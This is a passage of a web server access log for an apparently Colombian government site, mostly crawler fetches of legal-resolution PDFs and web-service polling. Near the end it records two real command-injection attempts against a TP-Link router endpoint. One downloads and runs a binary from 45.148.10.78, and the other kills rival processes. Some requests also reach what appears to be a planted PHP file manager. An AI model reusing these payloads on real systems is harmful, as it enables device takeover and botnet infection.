Qf2T8N8vLKGjXrk1fLSRx8N7GZpRTv+uRu4WQr6PM6av8LCcmo0yOG/QY7IW2CO0kN1aCZR2YjgSHalaAYISOTOqfM1tHnfAu/BjKO+hbsh9fe+hKdxNRHIiBnAGYMIE+ZX/t&u=U2FsdGVkX1+VWNSRE1D1z3wGKcwnCmo6oggCer9OwsmGJseTWvlmF1qbaLl6XYqy&y=U2FsdGVkX18DrA4I7caxljZuXGc2c5J3HK/FYfDAP0QgKDTSuIy4BclQtuUncbmI HTTP/1.1" 200 9875
186.102.99.234 - - [29/Jun/2024:10:18:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19JRY5nHdSpEMCb6+iXxedqe3LK0tEpbYzvdrNSKdzuPRbtgrfsVmbGyggfsAHzw6WzSN+vyV/Yfx8YVkjjkelm5iXdaI3nqBXK3e/Q8u0V2/YxvKSwhex5Rv4PKj1UEPmVK+RSWg1fjzVNcow7B/MNdd3yFojl/2jEbdZUTR/HUVgWEry5/hozCnQIM8ABbpU8ALvDrye+DoFVWrFaUTiPEdh7DGS7pcFKxxGx/++kB2K77r/xRRtjpdJo1lEYcifbelYNmEITe+svX5HCmUC9B2AGW9c1WsfEgUY3pO1lDo6GHHIf6XrWKdfoqzBqVgqOjDM63F0+I3euCMJQySYdnqmN6jY9MZUSbTW6ntocuj7J+Bgh12OTVV+WlQqMZ4WLxp2ViHPbVdgRZAR+k5hBKsxNHyqOCF7nszL3Pmba+UgBOVbdEZB7g+doamM18auaGud+XifE7bsTvasmO4LnvuYoKJ1qjI9F3t2RxYs6LhWWKYbIZh4E2Em27xCuWeMbGUvqDKhTyx8UIgHSySQhL+vnXkK0QRzYfB2mOPsoHYnxMupiaskrKRUB55DbmArnLWEUzPXajafodjAOzl4D2aiYGXFPQjZqiMKzNPRo4HfIVGE5sBfQAo92DN7hBrXSYS99z5GXA8zCcBL5ya7UXVX4sTIrswSeuNWvb/NvlXTRVpj1oz83bWmQCYP9bTQKh3cYJi9SBYSJjTBBmWIiiHhN7HOaJFwcylt8FKWNkzmIoRP9JVZ8&u=U2FsdGVkX1+VWNSRE1D1z3wGKcwnCmo6oggCer9OwsmGJseTWvlmF1qbaLl6XYqy&y=U2FsdGVkX18DrA4I7caxljZuXGc2c5J3HK/FYfDAP0QgKDTSuIy4BclQtuUncbmI HTTP/1.1" 200 208
186.102.99.234 - - [29/Jun/2024:10:18:11 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX18dwn1AWnFG616jLNJVUFhAaRIaYb1a33HsDjGAbVcMc6QvnRWxLBaj HTTP/1.1" 200 30244
66.249.66.12 - - [29/Jun/2024:10:18:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1400.pdf HTTP/1.1" 200 394139
201.245.192.253 - - [29/Jun/2024:10:18:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:10:19:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0599.pdf HTTP/1.1" 200 842567
66.249.66.11 - - [29/Jun/2024:10:19:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2796.pdf HTTP/1.1" 200 394557
201.245.192.253 - - [29/Jun/2024:10:19:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33180
66.249.66.12 - - [29/Jun/2024:10:19:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4719.pdf HTTP/1.1" 200 465600
201.245.192.253 - - [29/Jun/2024:10:19:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:10:19:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
18.216.173.35 - - [29/Jun/2024:10:19:58 -0500] "GET /robots.txt HTTP/1.1" 404 1018
18.216.173.35 - - [29/Jun/2024:10:19:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
200.118.242.169 - - [29/Jun/2024:10:20:00 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX19ioqBzPZvmzUYi0bRM30uBSAr8z46flCXSZwTVqKSdnaH63Twgtnmr+L/8mN70+jqwZHaS+dXq1Q==&y=U2FsdGVkX19xKwkhSm4FFtgp15PFXpSCyDtQ6fToJ/8epaSV/Yc1YobB3ndgIqrS HTTP/1.1" 200 30
201.245.192.253 - - [29/Jun/2024:10:19:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35139
200.118.242.169 - - [29/Jun/2024:10:20:00 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18lPmuFGlAAWnHdCoje39zGZS3Yv0+SfgGRKL1BxL0Pg8Bb7XN0kt8jWlDC20yqVjNbQii3q89/FJkMNhJmkhqR2DiVrb9RYkw=&u=U2FsdGVkX183NDSMBKDM3/+akMd/YtcesKz01Pa/hBY=&y=U2FsdGVkX19xKwkhSm4FFtgp15PFXpSCyDtQ6fToJ/8epaSV/Yc1YobB3ndgIqrS HTTP/1.1" 200 97
200.118.242.169 - - [29/Jun/2024:10:20:00 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+CfQqjZ7TXIpiXGc0Gem2Pj3q6k1cGeb1gJiRzEbkTZQLIzwCQub3zOT9v78CfmGqgaZ0KAhXloNkxM+saQLpNKeBZNiT9PPX/dHA/FHcCFeZuFGEbFC+lFMET5oqmBpVzrQ1kWPKLA9orl/fvHQLhOZCuVYF1aal4tECyMJj8CBz3+hyulxVhSzowCufLgB7pWtUG2GCr6iFF2a4RmwiMHRniM3mWgLLrNIEzwciQpiV68vrzjOVvtogfLEVJ+tWXszhoZJ1552SebQPr7U1znd3UmKj3RnBpyQFNKg8SR0F/ChZROHI9xVHVCrl8JckXKiAhLWQaZIzw6Cu4tXFW2P7c3oSUGZerUAzgZwNW7CQRFefPIPVF/qcdTNU7FT+l2YjPfHiOz8xgU0sx594wdUlMCgyG84FdwMaJsfgG0znah0KFUJoXKV0Gpric0pAbYYd12dTr8P4boCooPyQM23y87MCZ+ldPGN44eBwSjv27A0pucMXkCBgCOVycMPKlzL5w/uB6mi0iCrMwNKKKx9krkeZT9Bx16fPLlkwH46AUbk9uAd7hFql/ccjUzybxyS6wEspkZYvcyWV1NA2esOVkdr8Ya34d9SG5APPhUTp8/WJ9NKEtL3lHxqhEoebD78Jf1TU1zdSAlaWbuOHp9t1Ls79VdghEWHknpa8nWY7Ff/zgJ0E1Bcof8XEEHgaJyMC4mXDt0B/0FasoJ/Y6tatYXQpmwRMNBU+gTcbrVAa3w9Qkf7E39ovpRieqtqoommmrEMhtzlKulDQ3FNDWbkD3wDB7amj08ThVj97Nx3/2CenASQfJl+GoD5x54fggtMWfEopwILl0kcApjOs9cublUW2Zld5AAd4e0+OvHStGjZoQS7/nJqHKbqj2wC4M+QcUr7pg683E75kEv8r+82hVbRMs+/6CPsnLBLRNpI2kNvtRcfT1Etc4EX3cR21WheZD/HWb+nfwp9039l/apuEPzb7kvSCzg3EB+4ZMXlB+9Nt7HNrSVwULBIyhML9OVHs9A80msNqbKdjhMOkCn8W/XkUo2u3wZQJWGzpZsscCEeiYrsDVJfRhNvVt/VQ8ePOdBOIpXtNCDHVnY12LO9kGZguMcaBCWoMVfzvtZHIBR+Cmae2IgRVghTq+cyBvSvZiWB24UI0DeCAgVkXUzU102LaMyXOVOzDLb5PenXTZh7NKfiI0aIYAmjaeqxLwVQHWEV8Yfinb+PFqNnbjzAVMPNdtxjBHhhBphip2Uedi72Cxfp2C88UVqoFCbHq2wE7r4KQYFmFIo2XaUjl1tFFIgR6QlGdh3lFXz4R4aIrPdXDNimWQIEw+fQW6cVw06dHsa6rsHMEpv3ASvzUoj9reP/gi2zvbOesDXANsFAjAw/YZ77yhw0pRbbHoC5gVD11f7XYVellHn8I50i9tiIry3ybKugGzRrZhZRnoAs+vm6zIefwacXN7c4eiW67n/tBMUvhWuEZP81Aob4kI1sTiO0qqevD0uiw84ig1+jKU0hZTKqgI+y3k4hhOT2iwLKNq0nf63+/lTWKlEKy2dH7JUcM6yAOKeagaBxyBWS36tRB1X0NiW1rANLM0/2EBpbm4HeIwwpSayMf9XyjfhhXEfhHFNZ/Zmpt53qEuVVW2zqU7P/nA7r8Q+oB5yCcrFVwjoX6WA3CXYewkOvyWv98vcalOAYsCTP5h0FrjmRCM+imxYai1zzh2RcHX46TGVkY3qtOYmlazXNe2yEH/TQFLZ8aLDkw=&u=U2FsdGVkX183NDSMBKDM3/+akMd/YtcesKz01Pa/hBY=&y=U2FsdGVkX19xKwkhSm4FFtgp15PFXpSCyDtQ6fToJ/8epaSV/Yc1YobB3ndgIqrS HTTP/1.1" 200 1228
200.118.242.169 - - [29/Jun/2024:10:20:00 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+hcNDUcJB7inZ3ig+FGCC2/GUQLIooj2ED9MCbCYnPKD+U97GFUdzTFU1ddQ+WHybQ5tbXikV4PKaA2pzXukFVz0XZHwuRo0jl4f5qB18w3JNl+yykms0aSA9HtOPGYwT54Di9mM5hqZ7qtUD8gSu/DGNHjdqptFZixV1Aw4SK+ifRy5aEqHuAGRzxbRB8lJSPsAmrkqM0zQzJNcZrXeQDa24PGL8K0D05Gru4EW/+YX+zLly2Xl6ju/Eu823Nz5xUifiuTaQLK733DO1f5XqeUdeBOAX+hFpkVGowiXnDLGnBqFnVYvwFmAPZORL4yTZHa2dKZi7UX+40xnzPjHxvpKCDj0kprPyIBKC54XhfKklHyL4rjVKm7a7dLXU0jfmBILRYRJCSCT0nzJIKHsmERW2bHs5N3gwTvIKIwS+L8QOEUntBkUQWO+0M7Im7QVKK760mq/dI4MONwtqQVxNbWk5fczlbsXROsMQYHNfhugZgqqJuSzmR56UxU+K053scOGkKnA9oRgw+zec2Je/i4oEZo51iRE++++kKZR9kUtj1X6q9QVtQWeLjbqbVIrxveTBOvfGD3dP1thjlY7E9CsUmYfE26dg+iTfSD8sREo8C68xk9EFd3KxYFIunAiSVknAIEesbtYcO6FEBB5FTJkBVfnX/gJDSfkWfBpYIg9eY/PRSqz4YUl4prQfAka7DQP64fspj5ez2Hl4pWiIYANZrV+VqoCCPlxJyXdweE1O0p3GH81xN&u=U2FsdGVkX183NDSMBKDM3/+akMd/YtcesKz01Pa/hBY=&y=U2FsdGVkX19xKwkhSm4FFtgp15PFXpSCyDtQ6fToJ/8epaSV/Yc1YobB3ndgIqrS HTTP/1.1" 200 208
200.118.242.169 - - [29/Jun/2024:10:20:00 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX19ioqBzPZvmzUYi0bRM30uBSAr8z46flCXSZwTVqKSdnaH63Twgtnmr+L/8mN70+jqwZHaS+dXq1Q== HTTP/1.1" 200 30244
201.245.192.253 - - [29/Jun/2024:10:20:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.13 - - [29/Jun/2024:10:20:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0451.pdf HTTP/1.1" 200 388945
201.245.192.253 - - [29/Jun/2024:10:20:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:10:21:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1714.pdf HTTP/1.1" 200 586492
66.249.66.11 - - [29/Jun/2024:10:21:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5604.pdf HTTP/1.1" 200 456452
66.249.66.12 - - [29/Jun/2024:10:21:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5637.pdf HTTP/1.1" 200 899194
172.22.2.4 - - [29/Jun/2024:10:19:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
200.118.242.169 - - [29/Jun/2024:10:21:27 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+YrPcqcG3UJ3E7XTW6iwZtUaKGuKwe7RuKmdlqwgCiT3mIbkiz2yzwKTzff3NEnXJEO5JL81p9HNmg+960R0LHnCmyE03Z9g/566hLCrnl7hsii9qzuMgMkLZjGni40nv8M8QAyE98+WliXeOUdqM8WRojNrZg6xc3BqHu/JGJT0Gjb/vLh2KaSTVf3of0FYRHAAPuuAh3iNIhIVcaiMAoU82jp49n4sk1drnFv2lt1aUibs+0CAin7KS++MMCpEQh02b/E1cg6A==&u=U2FsdGVkX183NDSMBKDM3/+akMd/YtcesKz01Pa/hBY=&y=U2FsdGVkX19xKwkhSm4FFtgp15PFXpSCyDtQ6fToJ/8epaSV/Yc1YobB3ndgIqrS HTTP/1.1" 200 26
200.118.242.169 - - [29/Jun/2024:10:21:28 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19VwcMMoWOwwEi563MsECApc6xjXuEnfXLxHJKTZ3K1YWsfvT4pKIU3JG1zJY9g0fJWAl9tT55WEPSveSr7v8JFprRoYQPlE/Wk1dNYnkoxPhqtwMCF96gwli77AL3oqh3kuTtsleQButbLGAvdMOJmimipcPMaW2HeqrPmHdqc3vWI/oYTpjPG7DpKV00VFucUVBDIPSQsU4LteIMd+IlNuvKWG+R3MUP5dzFbT7gnFXcotZfXOpFvMUDnD1XT1rfqbL2hLbX7u544ObK/PCXWGuNSJxQ0nAw4tVPruCr3BBWf4/ndfXgDH8ENpN5uKrwxSDCFfho68GZf5xkxYeXe71bWIIP25tsq28zj+JoSl8emSoqi5NMYAAUxJ31Xo+oE1DRO8AQ49QhtC87Bb+ZEYHbd8aihnHYcVF84HXL34Li+TkfTWIC9KW0FAdB/HZMAVqwJyrOwmhcwk8n29m/kahfAGpnu/wxgUCF3+v13byh/MrvDJOWR9DzuocU8Kj8Mq7ujHfWRERJ0eN93QxON15oFCe8EKPd4g70ipq8njsfAtGmhNgC1hWT94Hrn6ZGLC3Njh0YFCkLLhO82KRRD5ZWt/vi/bdmvgPc5bvcvuYg4cGymxsTIX3yTxZfE35e136qn6bv7AUoEiDCq/LEP9OgDX/aWxHxzEGpYvk+JEXYlfCCrt1ahKxchC4BFtboMLHCDtQSqN8mMCQHuTCVT8ewFCt9LNt6bIpCc1ozHOLHqiWpMLQUcSYThkInBk3hmk80gZat1MbOvWgteMx+P5jX0E7HPc8m/z2iPoQqysMaiYv5JdaNnCWEcqja1v8Z8y3y/2j+kzqjvIEADnLGZNxzomtG6raXiHkHEE5FGLNWNQ/0onfhiijLU17lcyQohNq5/ZjMfuXWAUSrWBu2JJqQ/++4anY9TvDYxvJ7rCJ5YK4/Y7m1SYZm6hooAxpo4bRiV/4xkqDc3LPmHSuzdSXSRkMnC7M5B5pEpmyZ/lZNUYqYk5YfhBATNUjDnY052uYPIcvzGidNhoq0T1i2Mne8zFvtYjlcX3NeePDOvpw9QIt0Royo2nQr92JfzDQU7BsVn210h0rBiLhrOS7DkHC8EukJqiTk=&u=U2FsdGVkX183NDSMBKDM3/+akMd/YtcesKz01Pa/hBY=&y=U2FsdGVkX19xKwkhSm4FFtgp15PFXpSCyDtQ6fToJ/8epaSV/Yc1YobB3ndgIqrS HTTP/1.1" 200 26
200.118.242.169 - - [29/Jun/2024:10:21:29 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18fHzPzP8kfBlIwJcLNkD1eWbl7EC/OaMeXTJF8ROzbfp+NZR1vwtb74lICSfG/a+n2WHdw50eFBBy8a5DfBt+NpvbMQ0/zFddIW28r4LajcTZ0D4IYkJhFcSO/oSawbKIsf0g97ILYhOQVqt797jlqNkiO++0n+RE=&u=U2FsdGVkX183NDSMBKDM3/+akMd/YtcesKz01Pa/hBY=&y=U2FsdGVkX19xKwkhSm4FFtgp15PFXpSCyDtQ6fToJ/8epaSV/Yc1YobB3ndgIqrS HTTP/1.1" 200 26
200.118.242.169 - - [29/Jun/2024:10:21:29 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18IBkcrMWX3h20MrPGuBD+rr+/sOGQSmv5KBfnnCH/oSSc99sqJg178i8NkPBTwnlNxqIvmdKt/CFDFisvM20nK7TuSe09XsdXPA67DOOBMKvqozg0sQQVS3DWh3I6shSR0iI2cCMpBoXdzbKvIxuBOpxhYTJPB7qc=&u=U2FsdGVkX183NDSMBKDM3/+akMd/YtcesKz01Pa/hBY=&y=U2FsdGVkX19xKwkhSm4FFtgp15PFXpSCyDtQ6fToJ/8epaSV/Yc1YobB3ndgIqrS HTTP/1.1" 200 26
200.118.242.169 - - [29/Jun/2024:10:21:29 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18N5rkjq9LMbmsFoTsxl0DPdZ3CJbFXr50razGXXH8v6j7xM/thF0qvfnpRvsEuOC3UGlgwJGfCWxiPLdw32AwvPX0jl+aBpc+13M02/n7SyxO2EyzoZ8IWrg+69e+spslrLQN1BseLPg0Hgeym0q7fKGvJF67uNGs=&u=U2FsdGVkX183NDSMBKDM3/+akMd/YtcesKz01Pa/hBY=&y=U2FsdGVkX19xKwkhSm4FFtgp15PFXpSCyDtQ6fToJ/8epaSV/Yc1YobB3ndgIqrS HTTP/1.1" 200 26
200.118.242.169 - - [29/Jun/2024:10:21:30 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19u8+PKv1qFpVffjedb/tYlG45u5yraOHDteUbnhYNkBS6d5owrtO37xToYBk66cEGpFXyTZHYFduT6IYGOC5OK9s42ldHA6DSs8DWs0KBsZ1ZXeuPVrWHxm8I21o2aqj710Vwh+HRf/OevJNwBRjehCkkDzlu5Jx0QGi1V3PaN0elRXiq4zb3ps+y8RJNMVOIMbzG1sLwDEQ==&u=U2FsdGVkX183NDSMBKDM3/+akMd/YtcesKz01Pa/hBY=&y=U2FsdGVkX19xKwkhSm4FFtgp15PFXpSCyDtQ6fToJ/8epaSV/Yc1YobB3ndgIqrS HTTP/1.1" 200 26
200.118.242.169 - - [29/Jun/2024:10:21:30 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18HGUTIuNbyMFEPapIZ0SDXi6wMjZEhYtugp0JlBWq7kSYbYpiBjNR7MgoMfa7WeA2ch4mlV7/cHF4R+aMh6xj95t+8y3MulOK5iKGx2l14eH+4aSvTvHeFX3zE1iisU3GzrVD2B7ALC6Kat8mi5QCDNTJkDHT12blPLyv8Y33NqL6GFfkdv2eNEDz7dBpNYgnyAkQJuIbgAw==&u=U2FsdGVkX183NDSMBKDM3/+akMd/YtcesKz01Pa/hBY=&y=U2FsdGVkX19xKwkhSm4FFtgp15PFXpSCyDtQ6fToJ/8epaSV/Yc1YobB3ndgIqrS HTTP/1.1" 200 26
200.118.242.169 - - [29/Jun/2024:10:21:31 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18QFKmWVrKtST6jA2D5fmbpVfHn6423ptglVM+jvXnGP1fnAaZpZiPF+H0j9bRpSTAj+/7TUFGqxuTU1xGzOQTFw6PRrtyXew2HJ6iEdlUqKLmUZRMbJZrtpu/yWbqs0dV7IwVY7TUfZUy7bvK+GYpgAVm8Bbl1uJUIsxJORhEUFC6FECUDd8Ld&u=U2FsdGVkX183NDSMBKDM3/+akMd/YtcesKz01Pa/hBY=&y=U2FsdGVkX19xKwkhSm4FFtgp15PFXpSCyDtQ6fToJ/8epaSV/Yc1YobB3ndgIqrS HTTP/1.1" 200 26
66.249.66.11 - - [29/Jun/2024:10:21:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0594.pdf HTTP/1.1" 200 332968
216.245.221.92 - - [29/Jun/2024:10:21:50 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:10:21:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:10:21:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:10:20:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
66.249.66.12 - - [29/Jun/2024:10:22:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5867.pdf HTTP/1.1" 200 136492
40.77.167.241 - - [29/Jun/2024:10:22:35 -0500] "GET /BLA/resoluciones/00001070.tif HTTP/1.1" 404 1018
13.215.31.167 - - [29/Jun/2024:10:22:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2691.pdf&ft=download HTTP/1.1" 200 364528
66.249.66.12 - - [29/Jun/2024:10:22:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4066.pdf HTTP/1.1" 200 525600
201.245.192.253 - - [29/Jun/2024:10:22:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:10:23:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0428.pdf HTTP/1.1" 200 332689
201.245.192.253 - - [29/Jun/2024:10:23:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:10:23:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:10:24:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/05866.pdf HTTP/1.1" 200 2535150
66.249.66.11 - - [29/Jun/2024:10:24:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4436.pdf HTTP/1.1" 200 1330590
66.249.66.12 - - [29/Jun/2024:10:24:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201701-1750/20021720.tif HTTP/1.1" 200 75020
69.171.251.3 - - [29/Jun/2024:10:24:32 -0500] "GET /bogota-destino-elegido-por-la-universidad-ana-g-mendez-de-puerto-rico-para-explorar-su-riqueza-natural-y-procesos-comunitarios.html?fbclid=IwZXh0bgNhZW0CMTEAAR2ziUvVCtQ9pYyJR-73Tqlogavv8AMdpJY5oeorB6OxcZj7T-kIzxz8Sec_aem_VXyMZDsAV-PTOK1uOZ4UUA HTTP/1.1" 200 1196
66.249.66.11 - - [29/Jun/2024:10:24:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2399.pdf HTTP/1.1" 200 406932
201.245.192.253 - - [29/Jun/2024:10:24:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:10:25:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.12 - - [29/Jun/2024:10:25:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1454.pdf HTTP/1.1" 200 487328
201.245.192.253 - - [29/Jun/2024:10:25:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:10:25:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:10:26:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0381.pdf HTTP/1.1" 200 330370
66.249.66.12 - - [29/Jun/2024:10:26:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2639.pdf HTTP/1.1" 200 400842
66.249.66.11 - - [29/Jun/2024:10:26:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3239.pdf HTTP/1.1" 200 424317
216.245.221.92 - - [29/Jun/2024:10:26:50 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:10:26:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:10:25:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:10:27:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34949
201.245.192.253 - - [29/Jun/2024:10:27:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35139
66.249.66.12 - - [29/Jun/2024:10:27:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0686.pdf HTTP/1.1" 200 487170
66.249.66.12 - - [29/Jun/2024:10:27:54 -0500] "GET /sig/Manual%20de%20Procesos%20y%20Procedimientos/126PM04%20Evaluaci%C3%B3n%20Control%20y%20Seguimiento/126PM04-PR17%20Atenci%C3%B3n%20solicitud%20Salvoconducto%20Flora.pdf HTTP/1.1" 404 1018
201.245.192.253 - - [29/Jun/2024:10:27:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:10:27:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:10:26:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
66.249.66.12 - - [29/Jun/2024:10:28:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1328.pdf HTTP/1.1" 200 729289
66.249.66.13 - - [29/Jun/2024:10:28:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2350.pdf HTTP/1.1" 200 421724
201.245.192.253 - - [29/Jun/2024:10:28:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:10:29:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0758.pdf HTTP/1.1" 200 360679
66.249.66.13 - - [29/Jun/2024:10:29:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2485.pdf HTTP/1.1" 200 429862
201.245.192.253 - - [29/Jun/2024:10:29:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33180
141.98.83.197 - - [29/Jun/2024:10:29:40 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
141.98.83.197 - - [29/Jun/2024:10:29:40 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
66.249.66.11 - - [29/Jun/2024:10:29:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5143.pdf HTTP/1.1" 200 468686
201.245.192.253 - - [29/Jun/2024:10:29:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:10:29:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:10:29:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [29/Jun/2024:10:29:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35139
207.46.13.153 - - [29/Jun/2024:10:30:28 -0500] "GET /BLA/resoluciones/AUTOS%202013/2056.pdf HTTP/1.1" 200 1933393
66.249.66.11 - - [29/Jun/2024:10:30:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1329.pdf HTTP/1.1" 200 486742
66.249.66.11 - - [29/Jun/2024:10:30:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3949.pdf HTTP/1.1" 200 457549
201.245.192.253 - - [29/Jun/2024:10:30:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:10:31:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3582.pdf HTTP/1.1" 200 476305
66.249.66.11 - - [29/Jun/2024:10:31:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1392.pdf HTTP/1.1" 200 332285
216.245.221.92 - - [29/Jun/2024:10:31:50 -0500] "HEAD / HTTP/1.1" 200 -
